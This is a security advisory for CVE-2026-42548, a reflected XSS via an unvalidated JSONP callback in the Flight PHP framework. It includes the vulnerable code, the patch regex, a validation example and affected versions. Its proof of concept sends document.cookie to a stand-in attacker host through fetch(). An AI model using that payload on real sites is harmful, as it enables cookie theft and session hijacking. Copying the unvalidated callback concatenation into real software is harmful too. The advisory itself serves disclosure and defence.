GHSA-fcx8-ph5r-mxr4

Source
https://github.com/advisories/GHSA-fcx8-ph5r-mxr4
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-fcx8-ph5r-mxr4/GHSA-fcx8-ph5r-mxr4.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-fcx8-ph5r-mxr4
Aliases
  • CVE-2026-42548
Published
2026-05-06T21:34:15Z
Modified
2026-05-06T21:57:55.336006Z
Severity
  • 8.6 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N
Summary
Flight has reflected XSS through an unvalidated JSONP callback in Flight::jsonp()
Details

Summary

Flight::jsonp() concatenates the ?jsonp= query parameter directly into an application/javascript response body without validating that the value is a legal JavaScript identifier. An attacker can inject arbitrary JavaScript that executes in the response origin, enabling reflected cross-site scripting.

Affected code

flight/Engine.php (≈ lines 1000-1013):

// The callback name is taken straight from the query string ...
$callback = $this->request()->query[$param];
// ... and written into a JavaScript response body with no validation.
$this->response()
    ->status($code)
    ->header('Content-Type', 'application/javascript; charset=' . $charset)
    ->write($callback . '(' . $json . ');');

No regex or identifier validation is performed before the callback is written.

Proof of concept

Given any route that calls Flight::jsonp($data):

GET /api?jsonp=;window.xss=function(d){fetch('https://attacker.tld/c='+d)};xss(document.cookie);//

Reproduced response (Content-Type: application/javascript):

;window.xss=function(d){fetch('https://attacker.tld/c='+d)};xss(document.cookie);//({"ok":true,"msg":"hello"});

When the vulnerable endpoint is loaded via <script src="https://victim.tld/api?jsonp=…"> on a page controlled by the attacker, the injected JavaScript executes in the victim.tld origin whenever that page is embedded or visited in a same-origin context — cookie theft and session hijack follow.

Impact

  • Reflected XSS in any application calling Flight::jsonp().
  • Cookie theft / session hijack when JSONP endpoints are referenced from same-origin pages.
  • Exfiltration of authenticated API responses.

Patch (fixed in 3.18.1, commit b8dd23a)

_jsonp() now validates the callback name against ^[A-Za-z_$][\w$.]{0,127}$ before emitting it. An empty callback (no jsonp parameter) still behaves as before.
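As an added example (not Flight's own code), the unvalidated concatenation is shown beside a version that applies the identifier pattern from the patch; the function names and the plain $query array are assumptions standing in for Flight's request object.

```php
<?php
// Added example, not Flight's code. $query stands in for Flight's request()->query.
// Pattern from the advisory's patch; the D modifier is an addition so that '$'
// cannot match before a trailing newline (PCRE allows that without it).
const JSONP_CALLBACK_PATTERN = '/^[A-Za-z_$][\w$.]{0,127}$/D';

/** Vulnerable form: whatever arrived in ?jsonp= is echoed into JavaScript. */
function jsonpBodyUnvalidated(array $query, string $json, string $param = 'jsonp'): string
{
    $callback = $query[$param] ?? '';
    return $callback . '(' . $json . ');';
}

/**
 * Hardened form: a non-empty callback must be a plain (dotted) identifier.
 * An empty callback is passed through as before; anything else is rejected
 * and the caller should answer with 400 rather than emit the value.
 */
function jsonpBodyValidated(array $query, string $json, string $param = 'jsonp'): ?string
{
    $callback = $query[$param] ?? '';
    if ($callback !== '' && preg_match(JSONP_CALLBACK_PATTERN, $callback) !== 1) {
        return null;
    }
    return $callback . '(' . $json . ');';
}

// Constructed sample inputs: one legitimate name, three that must be refused.
$json  = json_encode(['ok' => true, 'msg' => 'hello']);
$cases = [
    'dotted'    => 'Flight.handle',          // accepted
    'digit'     => '1callback',              // rejected: leading digit
    'injection' => ';window.xss=1;//',       // rejected: punctuation
    'too_long'  => str_repeat('a', 129),     // rejected: 129 > 128 characters
    'newline'   => "cb\n",                   // rejected only because of the D modifier
];
foreach ($cases as $label => $cb) {
    $unsafe = jsonpBodyUnvalidated(['jsonp' => $cb], $json);
    $safe   = jsonpBodyValidated(['jsonp' => $cb], $json);
    printf("%-9s unvalidated: %s\n", $label, json_encode($unsafe));
    printf("%-9s validated:   %s\n", $label, $safe === null ? 'REJECTED' : $safe);
}
```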

Credit

Discovered by @Rootingg.

Database specific
{
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-06T21:34:15Z",
    "cwe_ids": [
        "CWE-79"
    ],
    "severity": "HIGH",
    "nvd_published_at": null
}
References

Affected packages

Packagist / flightphp/core

Package

Name
flightphp/core
Purl
pkg:composer/flightphp/core

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
3.18.1

Affected versions

v1.*
v1.0
v1.1
v1.1.5
v1.1.10
v1.2
v1.2.13
v1.2.14
v1.2.15
v1.2.17
v1.2.18
v1.2.19
v1.2.20
v1.2.21
v1.2.22
v1.3.0
v1.3.1
v1.3.2
v1.3.3
v1.3.4
v1.3.5
v1.3.7
v1.3.8
v1.3.9
v2.*
v2.0.0
v2.0.1
v3.*
v3.0.0
v3.0.1
v3.0.2
v3.1.0
v3.1.1
v3.2.0
v3.3.0
v3.4.0
v3.4.1
v3.4.2
v3.5.0
v3.5.2
v3.5.3
v3.6.0
v3.6.1
v3.6.2
v3.7.0
v3.7.1
v3.7.2
v3.8.0
v3.8.1
v3.9.0
v3.10.0
v3.10.1
v3.11.0
v3.11.1
v3.12.0
v3.13.0
v3.13.1
v3.14.0
v3.15.0
v3.15.1
v3.15.2
v3.15.3
v3.16.0
v3.16.1
v3.17.0
v3.17.1
v3.17.2
v3.17.3
v3.17.4
v3.18.0

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-fcx8-ph5r-mxr4/GHSA-fcx8-ph5r-mxr4.json"